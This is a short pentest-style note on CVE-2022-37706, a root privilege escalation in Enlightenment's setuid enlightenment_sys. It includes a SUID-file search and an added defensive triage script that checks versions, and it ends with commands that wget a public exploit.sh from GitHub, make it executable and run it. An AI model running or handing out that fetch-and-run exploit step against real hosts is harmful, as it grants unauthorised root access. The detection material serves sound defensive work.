Overview
Enlightenment is a Window Manager, Compositor, and Minimal Desktop for Linux (the primary platform), BSD, and any other compatible UNIX system. Enlightenment is classed as a “desktop shell” as it provides everything you need to operate your desktop or laptop, but it is not a full application suite. This covers functionality including launching applications, managing their windows, and performing system tasks like suspending, rebooting, managing files, and so on.

CVE-2022-37706: enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring.
Exploitation
Detect
- Check if enlightenment is SUID root (or other):
find / -perm -u=s -type f -exec ls -l {} + 2>/dev/null
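A narrower check for this specific issue, as an added example that is not from the original page or the Enlightenment project: it lists only setuid files named enlightenment_sys, reports their owner, and compares a version string against 0.25.4. The function names are hypothetical, and the installed version is assumed to be supplied by the caller (for example from the package manager).

```shell
#!/bin/sh
# Added triage example; not part of the original page or of Enlightenment.
FIXED_VERSION="0.25.4"   # first fixed release, per the overview

# List setuid files named enlightenment_sys under $1 (default /).
find_suid_enlightenment_sys() {
    find "${1:-/}" -type f -name enlightenment_sys -perm -4000 -print 2>/dev/null || true
}

# Numeric owner of a file: third field of `ls -ldn`.
owner_uid() {
    ls -ldn -- "$1" | awk '{ print $3 }'
}

# Succeed when dotted version $1 is strictly lower than $2.
# Missing or non-numeric components compare as their leading number (or 0).
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            if (x[i] + 0 < y[i] + 0) exit 0
            if (x[i] + 0 > y[i] + 0) exit 1
        }
        exit 1
    }'
}

# Classify every hit under $1 against version $2 (caller-supplied assumption).
triage() {
    find_suid_enlightenment_sys "${1:-/}" | while IFS= read -r path; do
        if [ "$(owner_uid "$path")" != "0" ]; then
            echo "INFO     $path is setuid but not owned by root"
        elif [ -z "${2:-}" ]; then
            echo "REVIEW   $path is setuid root; version unknown"
        elif version_lt "$2" "$FIXED_VERSION"; then
            echo "EXPOSED  $path is setuid root and $2 < $FIXED_VERSION"
        else
            echo "PATCHED  $path is setuid root; $2 >= $FIXED_VERSION"
        fi
    done
}

# Usage: triage / "<installed Enlightenment version>"
```

An EXPOSED line means the host matches both conditions in the overview: a setuid-root enlightenment_sys and a version before 0.25.4.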
Exploit
https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
wget https://raw.githubusercontent.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/refs/heads/main/exploit.sh
chmod +x exploit.sh
./exploit.sh